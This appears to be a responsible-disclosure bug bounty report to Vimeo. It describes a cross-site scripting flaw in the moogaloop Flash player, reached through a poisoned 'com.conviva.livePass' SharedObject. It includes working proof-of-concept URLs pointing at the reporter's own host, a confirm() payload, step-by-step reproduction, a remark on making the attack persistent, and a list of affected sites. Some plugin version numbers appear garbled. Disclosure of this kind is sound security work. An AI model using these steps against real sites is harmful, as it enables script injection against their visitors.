The moogaloop flash player includes in most cases http://f.vimeocdn.com/p/flash/moogaloop/6.0.30/controllers/videoControllerProgressive.swf. In that flash file we can find functionality that looks into the SharedObject "com.conviva.livePass" for recently loaded swf-URLs under the key "lastSwfUrls". As far as I understand it, this is intended to look up if a flash file has been recently been loaded and should be in the cache of the browser, to try to always hit the cached file even if the URLs vary.
For example an normal request to moogaloop would result in the following:
opening: http://f.vimeocdn.com/p/flash/moogaloop/6.0.31/moogaloop.swf?clip_id=38626783&autoplay=true => loads: http://f.vimeocdn.com/p/flash/moogaloop/6.0.31/controllers/videoControllerProgressive.swf => videoControllerProgressive.swf looks up https://livepass.conviva.com in SharedObject => if nothing is there, it loads for example https://livepassdl.conviva.com/ver/18.104.22.16877/LivePassModuleMain.swf => and saves that value in the SharedObject => else if an entry matches it will load the value stored in the SharedObject
SharedObjects in Flash are stored on the basis of the domain of the flash file, so in this case the file will always be stored in f.vimeocdn.com/com.conviva.livePass.sol. Using a vulnerability in moogaloop, we can set the SharedObject and get any flash file loaded we want. Resulting in XSS on any site that includes the moogaloop flash player via the deprecated embed code and not the iframe solution.
Since your bug bounty has been nothing but awesome and you seem to fix stuff near the speed of light, I'm not going to report this problem to others that are affected and also run bug-bounties.
examples: http://googledevelopers.blogspot.de/2008/06/code-review-io-videos-gears-release-app.html https://blog.etsy.com/en/2011/no-place-like-here-pass-the-baton/ http://www.magentocommerce.com/knowledge-base/entry/screencast-google-base-integration-in-magento https://github.com/blog/561 [blocked by Content Security Policy]
PoC: I was confused by the fact that this example only worked occasionally, until I realized that the functionality relies on the injected file being in the cache. So if you are using debugging tools like the browser console, make sure that the browser cache is not disabled.
Setting the SharedObject: http://f.vimeocdn.com/p/flash/moogaloop/6.0.30/moogaloop.swf?cdn_url=https://batr.am/exmp/v/10ece191bd6f4806ed0e7a165931a890a47ea250//set_shared_con.swf%3f
ActionScript source: https://batr.am/exmp/v/10ece191bd6f4806ed0e7a165931a890a47ea250//set_shared_con.swc
confirm('moin: ' + document.domain)
example 1: 1. open http://f.vimeocdn.com/p/flash/moogaloop/6.0.30/moogaloop.swf?cdn_url=https://batr.am/exmp/v/10ece191bd6f4806ed0e7a165931a890a47ea250//set_shared_con.swf%3f * wait a bit for everything to load (there should be a confirm-dialog urging you to continue) 2. open http://f.vimeocdn.com/p/flash/moogaloop/6.0.31/moogaloop.swf?clip_id=38626783&autoplay=true
example 2: 1. open http://f.vimeocdn.com/p/flash/moogaloop/6.0.30/moogaloop.swf?cdn_url=https://batr.am/exmp/v/10ece191bd6f4806ed0e7a165931a890a47ea250//set_shared_con.swf%3f * wait a bit for everything to load (there should be a confirm-dialog urging you to continue) 2. open http://batr.am/exmp/v/10ece191bd6f4806ed0e7a165931a890a47ea250/vimeo.html * this site contains the Embed Code from http://developer.vimeo.com/player/embedding only with VIDEO_ID replaced. 3. click on the video to start it * Our flash file is only loaded when the video starts playing and the default Embed Code is not set to autoplay.
The SharedObject gets overwritten when the video plays. So this example only works once after we set the malicious values. In a real exploit it would be no problem to make it permanent by resetting the value via our flash file that is included when the video plays.
Tested in: Win 8.1 | Google Chrome 41.0.2272.3 (dev-m) | Flash plugin 22.214.171.1247 Mac OS X 10.9.5 | Mozilla Firefox 35.0 | Flash plugin 126.96.36.199 Mac OS X 10.9.5 | Google Chrome 39.0.2171.99 | Flash plugin 188.8.131.527
Sometimes weirdly crashes/hangs in: Win 8.1 | Mozilla Firefox 35.0 | Flash plugin 16,0,0,235